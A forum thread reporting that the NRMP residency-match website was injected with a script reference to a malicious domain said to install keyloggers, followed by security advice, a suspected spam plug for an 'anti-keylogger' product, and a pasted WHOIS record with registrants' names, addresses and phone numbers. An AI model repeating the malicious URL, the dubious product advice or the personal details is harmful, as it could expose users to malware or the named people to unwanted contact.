NRMP site compromised

This forum made possible through the generous support of SDN members, donors, and sponsors. Thank you.
balaguru

balaguru

Full Member
Verified Member
Physician
15+ Year Member
Joined
Aug 16, 2007
Messages
274
Reaction score
211
Members don't see this ad.
So I thought I'd log into the site to enter a tentative rank list. The local machine that I was using kept throwing antivirus popups. The HTML source on their site contains a reference to 51yws.com/a.js which apparently installs some keyloggers. I sent email to [email protected]. I don't know if anybody is on the other end of that address so if you're using the site you might want to access it only from a machine running antivirus software.

*MOD NOTE: I just de-linked, better safe than sorry to leave a link to something that may be problematic out there* -t
 
Thank you for warning, balaguru!

I just wanted to add that anti-viruses do not actually protect from keyloggers. To be protected from keyloggers you should have somekind of anti-keylogger, for example this one:XXXXXXXXX
I would also advice everyone to visit such kind of sites only having anti-spyware and a firewall installed also.
 
CharmedGirl said:
Thank you for warning, balaguru!

I just wanted to add that anti-viruses do not actually protect from keyloggers. To be protected from keyloggers you should have somekind of anti-keylogger, for example this one: XXXX
I would also advice everyone to visit such kind of sites only having anti-spyware and a firewall installed also.
Click to expand...



Most of the modern antivirus suites (by symantec, ESET, mcafee) do in fact cover keyloggers. I am suspicious of the site you posted, especially seeing as you are currently a new user.



My advice is this:

1.) always keep up to date with Windows Update. When windows tells you there is a patch available, install it and reboot as asked.

If you happen to be ok with Mac OS, stick with it. Frankly you'd probably be safer in today's malware environment. Linux too.

2.) invest in a solid antivirus program from one of the major vendors -- AND KEEP IT UP TO DATE. most have autoupdate features, you just need to occasionally keep tabs on it. An out of date scanner is practically useless.

3.) windows firewall is decent. You don't really need anything beyond that. If you are paranoid (or you are on a static IP address) you can always throw a router between yourself and your broadband device and borrow the protection of NAT and a SPI firewall


Don't install any program that you didn't learn about in a legitimate fashion. A kosher antispyware program will have had reviews in one of the major print computing journals (PC Magazine, PC World, etc).

Caveat emptor
 
balaguru said:
So I thought I'd log into the site to enter a tentative rank list. The local machine that I was using kept throwing antivirus popups. The HTML source on their site contains a reference to 51yws.com/a.js which apparently installs some keyloggers. I sent email to [email protected]. I don't know if anybody is on the other end of that address so if you're using the site you might want to access it only from a machine running antivirus software.
Click to expand...



Kudos on the pickup. My IE7 is locked down (i run it by default in the high security setting...) so I didn't see it, but I did notice the lag and the status bar showing it was attempting to retrieve code from the remote site

Spoke briefly with NRMP, they are aware. As of now, the code looks like it has been removed from the main page.

The good news is that this seems to only be a defacement of the main NRMP site (NOT the R3 system). The pages that are served by their secure R3 server did not have any of this code (i checked this afternoon after you posted).

Hopefully they keep their act together and keep the servers clean...
 
WHOIS information for: 51yws.com:

Domain Name.......... 51yws.com
Creation Date........ 2008-01-14 23:27:57
Registration Date.... 2008-01-14 23:27:57
Expiry Date.......... 2009-01-14 23:27:57
Organisation Name.... Star Co.Ltd
Organisation Address. Star Street
Organisation Address. GuangZhou
Organisation Address. 100000
Organisation Address. GD
Organisation Address. CN

Admin Name........... Zhang ShanShan
Admin Address........ Star Street
Admin Address........ GuangZhou
Admin Address........ 100000
Admin Address........ GD
Admin Address........ CN
Admin Email.......... [email protected]

Bill Name............ Yang FuWei
Bill Address......... 5-32,55 Jingsan Road
Bill Address......... Zhengzhou
Bill Address......... 450008
Bill Address......... HA
Bill Address......... CN
Bill Phone........... +86.37163389133
Bill Fax............. +86.37163389132
 
You must log in or register to reply here.

Similar threads

Ligament
Patients marking correct surgical site pre-op?
Replies
19
Views
2K
ChiDO
ChiDO
I
Opinions on NJ former AOA sites?
Replies
0
Views
2K
imatarheel
I
bbc586
Wrong-site hemicraniectomy [Medical Malpractice Lawsuit Review]
Replies
2
Views
4K
deleted314957
D
YoungestBrother
Unfilled positions in surgery according to NRMP
Replies
4
Views
4K
qwerty89
Q
D
Applying for Gensurg and CT surg at the same site
Replies
4
Views
3K
themockjock
T
Top